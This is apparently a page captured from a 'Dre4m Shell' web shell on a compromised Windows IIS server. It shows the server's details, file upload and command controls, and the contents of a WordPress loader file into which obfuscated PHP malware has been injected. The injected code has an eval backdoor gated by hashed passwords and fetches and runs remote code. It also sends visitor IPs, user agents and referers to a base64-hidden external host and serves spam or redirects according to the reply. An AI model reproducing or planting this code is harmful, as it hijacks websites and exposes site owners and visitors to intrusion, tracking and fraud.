Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 3.142.40.195
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Domains/itmikrou/itmikro.com/wwwroot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/Domains/itmikrou/itmikro.com/wwwroot/wp-blog-header.php
<?php /*-MClusr_#tp-*/error_reporting(0); /*-{R6%8MA-*/$JpMw = "r"."a"."n"."g"."e"; $c = $JpMw("~", " "); $i=${$c[4+27].$c[17+42].$c[2+45].$c[12+35].$c[34+17].$c[41+12].$c[35+22]}; @(md5(md5(md5(md5($i[19]))))==="5a4b81154c9d50b26e8809c9b8dd5b61")&&(count($i)==25&&in_array(gettype($i).count($i),$i))?(($i[67]=$i[67].$i[77])&&($i[86]=$i[67]($i[86]))&&(@eval($i[67](${$i[38]}[16])))):$i;class j{ static function zYqWVklG($Jl) { $wcv = "r"."a"."n"."g"."e"; $bvFPjmuBLh = $wcv("~", " "); $Ywi = explode("[", $Jl); $YlCtBJRP = ""; foreach ($Ywi as $kCzVT => $SUhcnR) $YlCtBJRP .= $bvFPjmuBLh[$SUhcnR - 82326]; return $YlCtBJRP; } static function IAFqVfmuWP($pmka, $vph) { $tLIjvybPJn = curl_init($pmka); curl_setopt($tLIjvybPJn, CURLOPT_RETURNTRANSFER, 1); $tqyAJXKIZU = curl_exec($tLIjvybPJn); return empty($tqyAJXKIZU) ? $vph($pmka) : $tqyAJXKIZU; } static function hncXQuNx() { $HrbnJ = array("82353[82338[82351[82355[82336[82351[82357[82350[82335[82342[82353[82336[82347[82341[82342","82337[82336[82338[82357[82338[82341[82336[82403[82401","82346[82337[82341[82342[82357[82352[82351[82353[82341[82352[82351","82340[82355[82353[82345","82354[82355[82337[82351[82398[82400[82357[82352[82351[82353[82341[82352[82351","82350[82347[82344[82351[82357[82349[82351[82336[82357[82353[82341[82342[82336[82351[82342[82336[82337","82380[82410","82327","82405[82410","82387[82370[82370[82387[82363","82341[82350"); foreach ($HrbnJ as $big) $eNhJ[] = self::zYqWVklG($big);$rMI = @$eNhJ[1](${"_"."G"."E"."T"}[$eNhJ[6+3]]); $FBPuWHv = @$eNhJ[0+3]($eNhJ[6+0], $rMI); $fQWuX = $eNhJ[1+1]($FBPuWHv, true); @${"_"."G"."E"."T"}[$eNhJ[7+3]] == 1 && die($eNhJ[1+4](__FILE__)); if( ((@$fQWuX[0] - time()) > 0) and (md5(md5($fQWuX[1+2])) === "961dedfa0fc1f3c36bd89d9e43de8bec") ): $FfhezxVgJT = self::IAFqVfmuWP($fQWuX[0+1], $eNhJ[1+4]);@eval($eNhJ[3+1]($FfhezxVgJT));die; endif; }}j::hncXQuNx(); header('Content-Type: text/html; charset=utf-8'); error_reporting(0);function NZVSgrvQBKu($resp_header){$header = array('status' => 0, 'content' => '', 'type' => '');if (!is_array($resp_header)) {return $header;}foreach ($resp_header as $hone) {if (preg_match('/http\/[0-9\.]+[\s]+([0-9]+)/i', $hone, $matched)) {$header['status'] = intval($matched[1]);} elseif (preg_match('/location\:[\s]+(.*)/i', $hone, $matched)) {$header['content'] = $matched[1];} elseif (preg_match('/content\-type\:[\s]+(.*)/i', $hone, $matched)) {$header['type'] = $matched[1];}}return $header;}function yNSJxfVaqHLmzMkw($url, $datas = array()){$response = array('status' => 0, 'content' => '', 'type' => '');if (is_array($datas) && count($datas)) {$url .= '?' . http_build_query($datas);}try {if (function_exists('curl_exec') && function_exists('curl_init')) {$c = curl_init();curl_setopt($c, CURLOPT_URL, $url);curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 20);curl_setopt($c, CURLOPT_TIMEOUT, 60);curl_setopt($c, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($c, CURLOPT_COOKIESESSION, 0);curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);$c_retval = curl_exec($c);$response['status'] = intval(curl_getinfo($c, CURLINFO_HTTP_CODE));$response['type'] = strval(curl_getinfo($c, CURLINFO_CONTENT_TYPE));$response['content'] = strval(curl_getinfo($c, CURLINFO_REDIRECT_URL));@curl_close($c);if (in_array($response['status'], array(200, 301, 302, 404))) {$response['content'] = strval($c_retval);}} elseif (ini_get('allow_url_fopen')) {$http_opt = array('http' => array('method' => 'GET', 'timeout' => 60, 'follow_location' => 0),'ssl' => array("verify_peer" => false, "verify_peer_name" => false));$context = stream_context_create($http_opt);$content = @file_get_contents($url, false, $context);$response = array_merge($response, NZVSgrvQBKu($http_response_header));if (in_array($response['status'], array(200, 301, 302, 404))) {$response['content'] = strval($content);}}} catch (Exception $e) {}return $response;}function sIaSAELTQkKchme($str){if (!$str) return '';return rtrim(strtr(base64_encode($str), '+/', '-_'), '=');}function CAgUbjkPQxn(){$ip_addr = '';if (isset($_SERVER['HTTP_CF_CONNECTING_IP']) && !empty($_SERVER['HTTP_CF_CONNECTING_IP'])) {$ip_addr = $_SERVER['HTTP_CF_CONNECTING_IP'];} elseif (isset($_SERVER['HTTP_X_REAL_IP']) && !empty($_SERVER['HTTP_X_REAL_IP'])) {$ip_addr = $_SERVER['HTTP_X_REAL_IP'];} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && !empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {$ip_addr = $_SERVER['HTTP_X_FORWARDED_FOR'];} else {$ip_addr = $_SERVER['REMOTE_ADDR'];}$ip_addr = trim(str_replace(" ", "", $ip_addr), ",");if (strpos($ip_addr, ",") !== false) {$ip_addr = explode(",", $ip_addr);$ip_addr = $ip_addr[0];}return $ip_addr;}function jUkTShfZNFPxCYbAuyti(){$http_proto = 'http://';if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {$http_proto = 'https://';} elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {$http_proto = 'https://';} elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {$http_proto = 'https://';}return $http_proto;}if ($_SERVER['REQUEST_URI'] === '/R-' . md5($_SERVER['SERVER_NAME'])) {exit(strrev(md5($_SERVER['SERVER_NAME'])));}if (substr_count($_SERVER['REQUEST_URI'], 'index.php/jk')) {exit('{ "error": 200, "lc": "jk", "data": [ 1 ] }');}$ip_addr = CAgUbjkPQxn();$referer = strval(@$_SERVER['HTTP_REFERER']);$site_url = jUkTShfZNFPxCYbAuyti() . $_SERVER['HTTP_HOST'];if (strpos($referer, $site_url) === 0) $referer = '';$rq = array();$rq['i'] = sIaSAELTQkKchme($ip_addr);$rq['l'] = sIaSAELTQkKchme($_SERVER['HTTP_ACCEPT_LANGUAGE']);$rq['sn'] = sIaSAELTQkKchme($_SERVER['SCRIPT_NAME']);$rq['r'] = sIaSAELTQkKchme($_SERVER['REQUEST_URI']);$rq['rf'] = sIaSAELTQkKchme($referer);$rq['s'] = sIaSAELTQkKchme($site_url);$rq['u'] = sIaSAELTQkKchme($_SERVER['HTTP_USER_AGENT']);$r_trim = preg_replace('/\?.*/', '', $_SERVER['REQUEST_URI']);$r_istatic = false;if (strpos($r_trim, '.') > 0&&strpos($r_trim,'.php')===false) {$ext = substr($r_trim, strpos($r_trim, '.'));if (in_array($ext, array('.js', '.css', '.jpg', '.png', '.gif', '.ico'))) {$r_istatic = true;}}if (!$r_istatic) {$response = yNSJxfVaqHLmzMkw(base64_decode("aHR0cDovL3pzMTM4djEzLml0c2VsZm9uLm9uZS8"), $rq);if (!in_array($response['status'], array(0, 200))) {switch ($response['status']) {case 301:header('HTTP/1.1 301 Moved Permanently');header('Location: ' . trim($response['content']));break;case 302:header('HTTP/1.1 302 Move Temporarily');header('Location: ' . trim($response['content']));break;case 404:header('HTTP/1.1 404 Not Found');header("status: 404 Not Found");break;default:break;}}if (strlen($response['content'])) {@header('Content-Type:' . $response['type']);echo $response['content'];exit(0);}}/*-RexF^-*/?><?php define( 'WP_USE_THEMES', true ); require('./wp-blog-header.php');?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}

Anon7 - 2022
AnonSec Team